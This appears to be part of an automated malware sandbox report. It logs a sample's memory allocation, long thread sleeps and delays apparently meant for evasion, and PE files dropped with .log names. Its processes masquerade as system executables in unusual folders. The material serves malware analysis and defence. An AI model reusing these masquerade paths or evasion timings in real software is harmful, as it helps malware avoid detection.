                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeMemory allocated: F90000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeMemory allocated: 1AC30000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 1770000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 1B260000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 9F0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: A90000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 1A490000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599854
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599622
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599512
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 3600000
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599241
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 599109
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 598453
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 598156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 597968
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 597093
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596843
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596625
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596296
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 596015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595800
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595562
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 595195
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594921
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594531
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594295
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 594155
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593812
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593693
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593562
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593442
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593297
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593168
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 593062
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592921
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592807
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592643
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592492
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592375
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 592156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591640
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591433
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591140
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 591031
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590907
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590781
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590666
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590561
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590452
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590343
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590223
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 590080
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589953
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589836
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589734
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589624
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589515
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589405
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 589235
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588340
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588234
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588125
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 588015
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587906
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587794
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587577
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587468
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587358
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587249
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 587082
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586937
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586790
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586687
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586567
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586436
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 586137
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585605
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585437
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 585156
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 584959
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1761Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1738Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2105Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1881
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1815
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWindow / User API: threadDelayed 9441
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\JNOIyhEg.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\syOLALyL.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\urdulIjK.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\SVvXiHdY.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\lniDCMno.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\WepxKXjB.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\rxSvtOmf.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\QgDirqoj.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\hFbfZzNA.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\LHRZphiV.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\ujtbHYJE.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\dUteJCDk.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\NidZFKNk.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\AIflJiPS.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\PxIPwdiO.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\CeJjFnSo.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\zaakdHBM.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\fePfJVil.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\rWndvGZf.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\npUmXvsj.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\bZqOSDZv.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\kIKeCfec.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\qaACfJCc.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\iuTVQPCp.logJump to dropped file
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeDropped PE file which has not been started: C:\Users\user\Desktop\KpOqUOcm.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDropped PE file which has not been started: C:\Users\user\Desktop\zNoaAjFw.logJump to dropped file
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe TID: 7440Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5468Thread sleep count: 1761 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 1738 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep count: 2105 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3120Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 1881 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620Thread sleep count: 1815 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe TID: 6104Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe TID: 5716Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe TID: 3604Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 3140Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe TID: 4888Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe TID: 6904Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 1308Thread sleep time: -30000s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -31359464925306218s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -600000s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -599854s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -599734s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -599622s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -599512s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 2312Thread sleep time: -25200000s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -599241s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -599109s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -598453s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -598156s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -597968s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -597093s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -596843s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -596625s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -596296s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -596015s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -595800s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -595562s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -595343s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -595195s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -594921s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -594531s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -594295s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -594155s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593953s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593812s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593693s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593562s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593442s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593297s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593168s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -593062s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -592921s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -592807s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -592643s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -592492s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -592375s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -592156s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -591640s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -591433s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -591249s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -591140s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -591031s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590907s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590781s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590666s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590561s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590452s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590343s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590223s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -590080s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589953s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589836s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589734s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589624s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589515s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589405s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -589235s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -588687s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -588468s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -588340s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -588234s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -588125s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -588015s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587906s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587794s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587687s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587577s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587468s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587358s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587249s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -587082s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -586937s >= -30000s
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe TID: 7536Thread sleep time: -586790s >= -30000s
